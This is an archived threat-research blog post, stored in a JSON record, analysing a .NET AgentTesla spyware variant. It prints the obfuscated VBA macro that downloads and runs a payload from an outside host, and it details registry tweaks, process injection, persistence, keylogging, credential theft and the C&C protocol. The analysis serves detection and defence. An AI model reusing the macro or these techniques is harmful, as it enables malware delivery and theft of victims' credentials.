{ "id": "b49b07fc-2f33-455a-9b3e-16889b65a40c", "created_at": "2026-04-06T00:08:42.134162Z", "updated_at": "2026-04-10T03:21:31.322258Z", "deleted_at": null, "sha1_hash": "605e8b605960ac2a06f20739fc8b3e85890adfe6", "title": "In-Depth Analysis of A New Variant of .NET Malware AgentTesla", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4015511, "plain_text": "In-Depth Analysis of A New Variant of .NET Malware AgentTesla\r\nBy Xiaopeng Zhang\r\nPublished: 2017-06-28 · Archived: 2026-04-05 15:05:33 UTC\r\nBackground\r\nFortiGuard Labs recently captured some malware which was developed using the Microsoft .Net framework. I\r\nanalyzed one of them, it's a new variant from AgentTasla family. In this blog, I’m going to show you how it is able\r\nto steal information from a victim’s machine.\r\nThe malware was spread via a Microsoft Word document that contained an auto-executable malicious VBA\r\nMacro. Figure 1 below shows how it looks when it’s opened.\r\nFigure 1. When the malicious Word document is opened\r\nWhat the VBA code does\r\nOnce you click the “Enable Content” button, the malicious VBA Macro is executed covertly in the background.\r\nThe code first writes some key values into the device’s system registry to avoid the Macro security warning when\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 1 of 14\n\nopening Word documents with risky content the next time.  \r\nHere are the key values it writes into system registry:\r\nHKCU\\Software\\Microsoft\\Office\\{word version}\\Word\\Security\\,AccessVBOM, dword, 1\r\nHKCU\\Software\\Microsoft\\Office\\{word version}\\Word\\Security\\,VBAWarning, dword, 1\r\nFigure 2. Writing two key values into the system registry\r\nOnce that task is completed, it re-opens this Word document in a new Word program instance and exits. The\r\nMacro is executed again, but this time it follows a different code branch. The main purpose of the Macro executed\r\nin the new Word program instance is to dynamically extract a new VBA function (ljRIpdKkSmQPMbnLdh) and\r\nget it called.\r\nLet’s take a look at this function:\r\nSub ljRIpdKkSmQPMbnLdh()\r\n Dim dmvAQJch As String\r\n Dim JWyaIoTHtZaFG As String\r\n Dim TrbaApjsFydVkOGwjnzkpOB As String\r\n dmvAQJch = CreateObject(ThisDocument.bQYHDG(\"66627281787F833D6277747B7B\",\r\n15)).ExpandEnvironmentStrings(ThisDocument.bQYHDG(\"3463747C7F34\", 15))\r\n JWyaIoTHtZaFG = ThisDocument.bQYHDG(\"6B\", 15)\r\n TrbaApjsFydVkOGwjnzkpOB = ThisDocument.bQYHDG(\"797085823D748774\", 15)\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 2 of 14\n\ndmvAQJch = dmvAQJch + JWyaIoTHtZaFG + TrbaApjsFydVkOGwjnzkpOB\r\n Dim cllbWRRTqqWoZebEpYdGmnPBLAx As String\r\n cllbWRRTqqWoZebEpYdGmnPBLAx = ThisDocument.bQYHDG(\"7783837F493E3E43443D46463D42443D4142\r\n15)\r\n Dim OhYBGFWMcPWNnpvvuTeitVAK As Object\r\n Set OhYBGFWMcPWNnpvvuTeitVAK =\r\nCreateObject(ThisDocument.bQYHDG(\"5C7872817E827E75833D675C5B5763635F\", 15))\r\n OhYBGFWMcPWNnpvvuTeitVAK.Open ThisDocument.bQYHDG(\"565463\", 15), cllbWRRTqqWoZebEpYdGmn\r\n OhYBGFWMcPWNnpvvuTeitVAK.send\r\n If OhYBGFWMcPWNnpvvuTeitVAK.Status = 200 Then\r\n Dim BIPvJqwtceisuIuipCzbpsWRuhRwp As Object\r\n Set BIPvJqwtceisuIuipCzbpsWRuhRwp =\r\nCreateObject(ThisDocument.bQYHDG(\"50535E53513D62838174707C\", 15))\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Open\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Type = 1\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Write OhYBGFWMcPWNnpvvuTeitVAK.responseBody\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.SaveToFile dmvAQJch, 2\r\n BIPvJqwtceisuIuipCzbpsWRuhRwp.Close\r\n End If\r\n If Len(Dir(dmvAQJch)) \u003c\u003e 0 Then\r\n Dim TGoCeWgrszAukk\r\n TGoCeWgrszAukk = Shell(dmvAQJch, 0)\r\n End If\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 3 of 14\n\nEnd Sub\r\nAll key words in this function are encoded. Here they are after decoding:\r\nbQYHDG(\"66627281787F833D6277747B7B\", 15) =\u003e “WScript.Shell”\r\nbQYHDG(\"3463747C7F34\", 15) =\u003e “%Temp%”\r\nbQYHDG(\"797085823D748774\", 15) =\u003e “javs.exe”\r\nbQYHDG(\"7783837F493E3E43443D46463D42443D4142483E403E837E7370883D748774\", 15) =\u003e “hxxp://45.\r\nbQYHDG(\"5C7872817E827E75833D675C5B5763635F\", 15) =\u003e “Microsoft.XMLHTTP”\r\nbQYHDG(\"565463\", 15) =\u003e “Get”\r\nAs you may have realized from the highlighted keywords, this malware is designed to download an executable file\r\nand run it by calling the “Shell” function. Indeed, it downloads the file “today.exe” to “%Temp%\\javs.exe”, and\r\nruns it.\r\nThe downloaded exe file\r\nFigure 3. Detailed information of the downloaded javs.exe file\r\nFrom the analysis result of the PE analysis tool in Figure 3, we know that the downloaded “javs.exe” was\r\nbuilt with .Net Framework. Looking at its icon, it is easy to assume that this is a pdf related file. But it’s not. This\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 4 of 14\n\nis simply a deception used to confuse the victim.\r\nOnce executed, it starts another process by calling the function CreateProcessA with the CREATE_SUSPENDED\r\nflag. This procedure could allow the memory of the second process to be modified by calling the function\r\nWriteProcessMemory. Finally, the process is restored to run by calling the functions SetThreadContext and\r\nResumeThread.\r\nFigure 4, below, shows how CreateProcessA is called.\r\nFigure 4. javs.exe calls CreateProcessA\r\nThrough my analysis, I was able to determine that the data being injected into the second process by calling\r\nWriteProcessMemory is another executable file. This file was decoded from a BMP resource in the first javs.exe\r\nprocess. Interestingly, the injected executable was also built with .Net framework.\r\nAs you may know, the .Net program only contains complied bytecode. This code can only be parsed and executed\r\nin its .Net CLR virtual machine. As a result, debugging a .Net program using the usual Ollydbg or Windbg tools is\r\na challenge. So I had to determine which other analysis tools would work.\r\nAnalysis of the second .Net program\r\nFrom the above analysis, I was able to determine that the second .Net program had been dynamically decoded\r\nfrom the javs.exe process memory. So the next challenge was capturing its entire data and saving it as an exe file\r\nfor analysis. To do that, I used the memory tool to dump it directly from the second process memory. Figure 5\r\nshows what the dumped file looks like in the analysis tool.\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 5 of 14\n\nFigure 5. Dumped memory file in analysis tool\r\nThe “File is corrupted” warning obviously occurs because the dumped file’s PE header was wrong. I manually\r\nrepaired the PE header using a sort of unpacking technique.  After that, the dumped file could be recognized,\r\nstatically analyzed, and debugged. In Figure 6 below, you can see the repaired file was recognized as a .Net\r\nassembly, and you even can see .NET Directory information in CFF Explorer.\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 6 of 14\n\nFigure 6. Repaired dump file in analysis tool\r\nThe author of the malware used some anti-analysis techniques to prevent it from being analyzed.  For example,\r\nobfuscation is used to make the function names and variable names difficult to understand, and encoding is used\r\nto hide key words and data so analysts have a hard time understanding what it is trying to do. The repaired .Net\r\nprogram even causes the static analysis tool .NET Reflector to not work because the names of classes, functions,\r\nand variables are unreadable. From Figure 7 below, you can see what the code looks like using these techniques.\r\nFigure 7. The Main function with anti-analysis techniques\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 7 of 14\n\nTo better analyze the malware, I tried to rename parts of the unreadable names. So please note that in the\r\nfollowing analysis the unreadable names in the referred code have been renamed to readable names.\r\nOk, at this point we are finally ready to do the analysis.  Let’s get started to see what is going to happen.\r\nAnalysis of the .Net malware\r\nOnce executed, it goes through the current running processes to kill any duplicate processes found. It then sends\r\n“uninstall” and “update” commands to the C\u0026C server. If the response to the “uninstall” command from the\r\nserver contains an “uninstall” string, it cleans up the information it has written on the victim’s machine and exits.\r\nWhen I ran the malware, no “uninstall” string was contained in the response, so I could proceed with the analysis.\r\nThe following two Figures show you how the “update” command is sent to the C\u0026C server.\r\nFigure 8. Sending “update” command to C\u0026C server\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 8 of 14\n\nFigure 9. Function used to send data to the C\u0026C server\r\nFrom Figure 9, we learn that the URL of the C\u0026C server is\r\n“hxxp://www.vacanzaimmobiliare.it/testla/WebPanel/post.php”, which was decrypted in the “SendToCCServer”\r\nfunction. The HTTP method is “POST”, which was also decrypted.\r\nNext, it copies itself from “%temp%\\javs.exe” to “%appdata%\\Java\\JavaUpdtr.exe”. In this way it disguises itself\r\nby looking like an update program for Java. It then writes the full path into the value\r\n\"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" in the system registry so that “JavaUpdtr.exe”\r\ncan be executed automatically when the system starts.\r\nThe code snippet below shows us how the full path to “JavaUpdtr.exe” is defined.\r\nprivate static string appdata_Java_JavaUpdtr.exe = Environment.GetEnvironmentVariable(\"appd\r\nThis malware can record the victim’s keyboard inputs, steal data from the system clipboard when its content\r\nchanges, capture screenshots of the victim’s system screen, and collect credentials from installed software that the\r\nmalware is interested in. To complete these tasks, it creates a variety of threads and timers.\r\nIn the following sections I’ll discuss them in detail.\r\nStealing keyboard inputs, system clipboard contents, and screen shots\r\nBefore the Main function is called, three hook objects are defined in the construction function of the main class.\r\nThese are used for hooking the Keyboard, Mouse, and Clipboard.  It then sets hook functions for all of them so\r\nthat when victim inputs something by keyboard, or when the clipboard data is changed (Ctrl+C), the hook\r\nfunctions will be called first. Figure 10 shows part of the hook function of the key down event.\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 9 of 14\n\nFigure 10. Key “down” event hook function\r\nIn this function, it first grabs the Window title where the victim types in and puts it into an html code. Next, it\r\ncaptures which key the victim presses, and converts the key code string into an html code. For example, “\r\n\". As you can see, the html code is concatenated\r\nto the variable “pri_string_saveAllStolenKey_Clipboard_Data”. Note: I modified the name to be readable.\r\nIn the hook function for the system clipboard, it goes through a similar process. It captures the clipboard content\r\nevery time the clipboard content is changed (e.g press Ctrl+C , Ctrl+X, etc.) by calling the function\r\nClipboard.GetText(). It then puts the collected data into an html code, and again concatenates it to the variable\r\n“pri_string_saveAllStolenKey_Clipboard_Data”. Figure 11 is the code snippet of this function.\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 10 of 14\n\nFigure 11. Clipboard change event hook function\r\nIt also creates a timer whose function is called every 10 minutes.  In the timer function, it captures screenshots of\r\nthe victim’s screen and then uses the API “Graphics::CopyFromScreen” to grab the screenshots and saves them\r\ninto the file “%appdata%\\ScreenShot\\screen.jpeg”. It later encodes the file screen.jpeg with base64 and then sends\r\nit to its C\u0026C server using the command “screenshots”.\r\nIt keeps taking screenshots every 10 minutes and sends them to the C\u0026C server so the malware author can see\r\nwhat the victim is doing. Figure 12 shows the malware sending out a screen.jpeg file by calling the sending\r\nfunction.\r\nFigure 12. Sending out a screenshot file\r\nStealing the credentials of installed software\r\nAt the end of the Main function, it creates another thread whose function is to collect credentials from a variety of\r\nsoftware on the victim’s machine. It can collect user credentials from the system registry, local profile files,\r\nSQLite database files, and so on. Once it has captured the credentials of one the software packages it is looking\r\nfor, it immediately sends it to the C\u0026C server. One HTTP packet contains the credentials of one software package.\r\nBased on my analysis, this malware is able to obtain the credentials from the following software.\r\nBrowser clients:\r\nGoogle Chrome, Mozilla  Firefox, Opera, Yandex, Microsoft IE, Apple Safari, SeaMonkey, ComodoDragon,\r\nFlockBrowser, CoolNovo, SRWareIron, UC browser, Torch Browser.\r\nEmail clients:\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 11 of 14\n\nMicrosoft Office Outlook, Mozilla Thunderbird, Foxmail, Opera Mail, PocoMail, Eudora, TheBat!.\r\nFTP clients:\r\nFileZilla, WS_FTP, WinSCP, CoreFTP, FlashFXP, SmartFTP, FTPCommander.\r\nDynamic DNS:\r\nDynDNS, No-IP.\r\nVideo chatting:\r\nPaltalk, Pidgin.\r\nDownload management:\r\nInternet Download Manager, JDownloader.\r\nIn my test environment, I installed Microsoft Office Outlook with a Gmail account. Figure 13 shows what\r\nOutlook data is sent to the C\u0026C server.\r\nFigure 13. Sending the captured credentials of Microsoft Office Outlook\r\nC\u0026C command format\r\nBelow is the C\u0026C command format string.\r\n\"type={0}\u0026hwid={1}\u0026time={2}\u0026pcname={3}\u0026logdata={4}\u0026screen={5}\u0026ipadd={6}\u0026wbscreen={7}\u0026client=\r\n{8}\u0026link={9}\u0026username={10}\u0026password={11}\u0026screen_name={12}\"\r\nNext, I will explain the meaning of each field.\r\n \"type\" holds the command name; \"hwid\" is the hardware id; \"time\" is the current date and time; \"pcname\"\r\nconsists of the user name and computer name; \"logdata\" consists of key log and clipboard data; \"screen\" is base64\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 12 of 14\n\nencoded screen.jpeg file content; \"ipadd\" is not used; \"wbscreen\" consists of picture content from the camera;\r\n\"client\" is the name of the software; \"link\" is the software’s website; \"username\" is the logon user name;\r\n\"password\" is the logon password; \"screen_name\" is not used .\r\nIn the table below, all the C\u0026C commands (type field) that the malware supports are listed.\r\nCommand Comment\r\nuninstall Ask the server if exit itself\r\nupdate Send the server updates of victim’s device\r\ninfo Send the server victim’s system information\r\nwebcam Send image files from victim’s camera if have\r\nscreenshots Send screenshot of victim’s screen\r\nkeylog Send the server recorded key inputs and clipboard data\r\npasswords Send collected credentials from some software\r\nOther features\r\nThrough my analysis I was able to determine that this is a spyware designed to collects a victim’s system\r\ninformation, and continually record the victim’s keyboard inputs, changes to the system clipboard, as well as\r\ncapture the credentials of a number of popular software tools.  Finally, it sends all the collected data to its C\u0026C\r\nserver.\r\nHowever, by carefully going through the decompiled *.cs files, I was able to discover some additional features\r\nbuilt into this malware that are not currently used. They include:\r\nUsing the SMTP protocol to communicate with the server instead of HTTP.\r\nObtaining system hardware information, including processor, memory, and video card.\r\nEnabling the collection of images from victim’s camera.\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 13 of 14\n\nRestarting the system after adding “JavaUptr.exe” to the startup group in the system registry.\r\nKilling any running analysis processes, AV software, or Keylogger software, etc.\r\nThere is the possibility that these features will be used in future versions.\r\nSolution\r\nThe Word sample is detected as “WM/Agent.DJO!tr.dldr”, and Javs.exe has been detected as\r\n“MSIL/Generic.AP.EA826!tr” by FortiGuard AntiVirus service.\r\nThe URL of the C\u0026C server has been detected as “Malicious Websites” by FortiGuard WebFilter service.\r\nIoC:\r\nURL:\r\n45.77.35.239/1/today.exe\r\nwww.vacanzaimmobiliare.it/testla/WebPanel/post.php\r\nSample SHA256:\r\nYachtworld Invoice Outstanding.doc\r\n1A713E4DDD8B1A6117C10AFE0C45496DFB61154BFF79A6DEE0A9FFB0518F33D3\r\nJavs.exe\r\n5D4E22BE32DCE5474B61E0DF305861F2C07B10DDADBC2DC937481C7D2B736C81\r\nSource: https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nhttps://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "references": [ "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html" ], "report_names": [ "in-depth-analysis-of-net-malware-javaupdtr.html" ], "threat_actors": [], "ts_created_at": 1775434122, "ts_updated_at": 1775791291, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.pdf", "text": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.txt", "img": "https://archive.orkl.eu/605e8b605960ac2a06f20739fc8b3e85890adfe6.jpg" } }